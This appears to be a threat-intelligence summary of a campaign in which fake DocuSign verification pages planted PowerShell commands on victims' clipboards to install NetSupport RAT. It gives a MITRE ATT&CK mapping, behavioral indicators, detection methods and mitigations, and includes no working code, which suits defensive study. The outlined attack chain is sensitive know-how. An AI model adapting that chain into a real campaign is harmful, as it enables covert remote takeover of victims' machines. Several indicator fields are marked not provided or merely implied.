Full Report
Malware campaign used fake DocuSign pages to deploy NetSupport RAT through clipboard manipulation
Analysis Summary
# Tool/Technique: NetSupport RAT
## Overview
NetSupport RAT is a Remote Access Trojan leveraged in a multi-stage malware campaign that utilizes fake DocuSign verification pages to trick users into executing malicious code on their systems. The goal is to establish persistent remote access for the attacker.
## Technical Details
- Type: Malware family (Remote Access Trojan - RAT)
- Platform: Windows (implied by usage of PowerShell and Windows Run prompt)
- Capabilities: Remote control, persistence establishment, multi-stage download, obfuscation.
- First Seen: Not specified in the context, but the campaign exploiting DocuSign pages is recent/newly uncovered.
## MITRE ATT&CK Mapping
The described execution flow maps to several standard MITRE ATT&CK techniques:
- **TA0001 - Initial Access**
- T1566 - Phishing
- **T1566.002 - Spearphishing via Link** (Implied by directing user to a fake page)
- **TA0002 - Execution**
- T1059 - Command and Scripting Interpreter
- **T1059.001 - PowerShell** (Used for downloading and executing second-stage payload)
- T1204 - User Execution
- **T1204.002 - Malicious File** (User executes the clipboard-delivered script)
- **TA0003 - Persistence**
- T1547 - Boot or Logon Autostart Execution
- **T1547.001 - Registry Run Keys / Startup Folder** (Placing a shortcut in the Startup folder)
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol
- (Likely used by NetSupport RAT for C2 communication)
## Functionality
### Core Capabilities
- Deceptive phishing via spoofed DocuSign verification pages.
- Clipboard poisoning to inject malicious commands.
- Execution of a malicious PowerShell script.
- Downloading and deploying a second-stage executable payload.
- Establishing persistence via the Windows Startup folder.
### Advanced Features
- **Obfuscation:** The initial script utilized ROT13 encoding to hide its intent.
- **Branding Mimicry:** Blending Cloudflare and DocuSign branding to enhance legitimacy.
- **Multi-Stage Delivery:** Utilizing sequential stages (initial script -> second-stage executable via GitHub -> final RAT payload) to complicate analysis and bypass initial defenses.
## Indicators of Compromise
- File Hashes: [Not provided]
- File Names: [Not provided, but likely uses generic or disguised executable names for the second stage]
- Registry Keys: [Implied manipulation of the Startup folder location for persistence]
- Network Indicators: [C2 communication channels inherent to the NetSupport RAT, but specific IPs/domains are defanged: Not provided]
- Behavioral Indicators:
- User interaction with a fake CAPTCHA/verification page.
- Execution of pasted PowerShell commands from the clipboard via the Run prompt (`Win+R`).
- Creation of a new shortcut file in the `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup` directory or similar location.
## Associated Threat Actors
- Threat actors behind the specific campaign leveraging the DocuSign theme are not explicitly named in the provided text. NetSupport RAT itself is a commercially available tool often leveraged by various malicious actors.
## Detection Methods
- Signature-based detection: Requires signatures for the final NetSupport RAT executable and the specific obfuscated PowerShell payload.
- Behavioral detection: Monitoring for the sequence of clipboard manipulation followed by PowerShell execution initiated via the Run prompt, or the creation of startup shortcuts pointing to suspicious dynamic downloads.
- YARA rules: [Not provided]
## Mitigation Strategies
- **User Education:** Training users to be highly suspicious of unexpected documents requiring urgent verification, especially those prompting manual command line execution.
- **Endpoint Visibility:** Implementing robust logging for PowerShell execution, particularly commands sourced from unintended inputs (like copies from the clipboard).
- **Application Control:** Restricting the execution of unsigned or unknown executables downloaded dynamically.
- **Network Filtering:** Monitoring outbound connections from endpoints to known file-sharing services like GitHub being used to host malicious binaries.
## Related Tools/Techniques
- Clipboard-Injector Attacks (mentioned generally in the context of clipboard poisoning).
- Legitimate Remote Access Software used maliciously (RATs).